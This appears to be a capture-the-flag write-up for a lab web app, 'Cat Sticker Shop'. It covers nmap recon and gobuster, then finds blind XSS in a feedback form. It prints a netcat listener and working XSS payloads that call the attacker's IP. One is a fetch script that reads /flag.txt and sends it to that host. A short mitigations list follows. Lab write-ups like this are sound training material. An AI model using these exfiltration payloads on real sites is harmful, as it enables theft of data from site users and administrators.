| description |
|---|
🎯 Target IP: 10.10.73.89
Create a directory for machine on the Desktop and a directory containing the scans with nmap.
su
echo "10.10.73.89 tss.thm" >> /etc/hosts
mkdir thm/tss.thm
cd thm/tss.thm
mkdir {nmap,content,exploits,scripts}
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
ping -c 3 tss.thm
PING tss.thm (10.10.73.89) 56(84) bytes of data.
64 bytes from tss.thm (10.10.73.89): icmp_seq=1 ttl=63 time=65.0 ms
64 bytes from tss.thm (10.10.73.89): icmp_seq=2 ttl=63 time=61.9 ms
64 bytes from tss.thm (10.10.73.89): icmp_seq=3 ttl=63 time=62.3 msSending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix, while Windows systems usually have a TTL of 128 secs.
This guide does not provide a path and intermediate answers, but asks us directly for the flag.
Let's capture her right away with a curl curl -i http://tss.thm:8080/flag.txt
.png)
2 of spades! :D
.png)
Not worry, start to check information scanning open ports:
nmap --open -p0- -n -Pn -vvv --min-rate 5000 tss.thm -oG nmap/port_scanPORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
8080/tcp open http-proxy syn-ack ttl 63| command | result |
|---|---|
| sudo | run as root |
| sC | run default scripts |
| sV | enumerate versions |
| A | aggressive mode |
| T4 | run a bit faster |
| oN | output to file with nmap formatting |
It looks like there are 2 open ports on the machine: 22 and 8080.
Now, we need to search which services are running on open ports:
nmap -p22,8080 -n -Pn -vvv -sCV --min-rate 5000 tss.thm -oN nmap/open_portPORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:54:8c:e2:d7:67:ab:8f:90:b3:6f:52:c2:73:37:69 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDZ5yrbM4EUF9kvSfSmVTdRWGVeqTTpQpwFopgW7iFN3f/I3mBWiJpAGL8Q8rEs7n8ESeN0yRcr1lGSuUtRqk5Mwei9edFIAGFC0uEJMnO7EQl/3O8PAlTGeuIaEg+YItzpmXOIWfslh0oftoQNN0iWouJFj7DU5QtoiuwK9GIDwD54aaJ6QQHu16nYYk0fTmA2szzSy0nL0fG1I+ILOnVf1SEyDu5a+uHSKA4lERXWsJ6KDhEtxAuf1+uk8x33I4ERJQsGEZ/GbFJsPxbWhFgyvRE9cScm+YpeppPBMwbvicnEg+MZLuDfXAzYCsDvXPem8io/8QlqHXAyTb/hfw8twUiLuWRHPuHH6E4tq+cztlD/BsfydBn+72TEB7dZnRnWP4tAnI5au2KiPA1RA3ud3JNn7Ha7iU0AA5MK9gKhSv/S5tDyLhFbAcLm8ByWzdJ1R5F8NIlWG8C9VDgDuixmIQwsV4D7FthMTsDaM5PuJHr5GDOfT56Mn3fGxQT2W4k=
| 256 14:29:ec:36:95:e5:64:49:39:3f:b4:ec:ca:5f:ee:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKVWb4NfXmP4f5RQIvXlrggi/9cDARgYazfJpJFlRhH/Ypg/QO6JQ0cj+BInTq4qjv9q5f1ksX0KLJxT2sc95WI=
| 256 19:eb:1f:c9:67:92:01:61:0c:14:fe:71:4b:0d:50:40 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHQ5WIN3vZO9KIDXb+PpV5yqA3SVieIqn8jSOGdjDHm1
8080/tcp open http syn-ack ttl 63 Werkzeug httpd 3.0.1 (Python 3.8.10)
|_http-title: Cat Sticker Shop
|_http-server-header: Werkzeug/3.0.1 Python/3.8.10
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelThe web server is configured on port 8080 and not on 80, let's go there!
Proceeding to enumerate our website using a cmd tool: whatweb "http://tss.thm:8080"
.png)
We just know this info through nmap scan results, we'll investigate very well about "werkzeug 3.0 1 python 3.8 10", we will eventually check if it is vulnerable later.
TNow let's open the browser to view the web page (port 8080):
here, there're two products/sticker images that we can only see.
.png)
and see page source for checking information disclosure.
.png)
but we don't find precious info.
In the meantime I ran a 'directory enumeration' scan with gobuster, which unfortunately returned no results.
gobuster dir -u http://tss.thm:8080 -w /usr/share/wordlists/dirb/common.txtLet's move to the second page: "Feedback":
.png)
Very good, a textarea where we can write and submit a feedback, it can be an injection point.
Testing the standard XSS payload: <script>alert("XSS")</script> we have no errors, but at the same time nothing is reflected:
.png)
let's analyze the thing better by capturing the http request with our dear Burp Suite proxy.
.png)
We can see that's a POST request and the following file formats are accepted in the form
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng
Since the possible XSS seems hidden, let's try to see if it allows us to connect to our attacker machine using the javascript method: fetch
Retrieve our attacker machine IP (10.21.31.235)
.png)
Go in listening mode with netcat on port 1339: nc -lvnp 1339
and execute into BurpSuite Repeater or directly into textarea this command:
<img src=x onerror="fetch('http://10.21.31.235:1339')"/>and we receive the request, fantastic!
.png)
Based on this and remembering that the flag is in the path /flag.txt, we prepare a payload that allows us to extract the flag in the response:
<script>
fetch('http://tss.thm:8080/flag.txt') // Requests the flag file from the target server
.then(response => response.text()) // Reads the response as text
.then(data => {
fetch('http://10.21.31.235:1339/?data=' + encodeURIComponent(data)) // Sends stolen data to attacker's machine
})
</script>.png)
Flag found!
Possible Mitigations
- Content Security Policy (CSP): Block inline scripts and limit allowed domains for
fetchrequests.
- Proper XSS filtering: Sanitize user inputs to prevent script injection.
- Same-Origin Policy enforcement: Ensure sensitive files like
flag.txtare not accessible from untrusted origins.
- HttpOnly & Secure cookies: Prevent session hijacking through XSS attacks
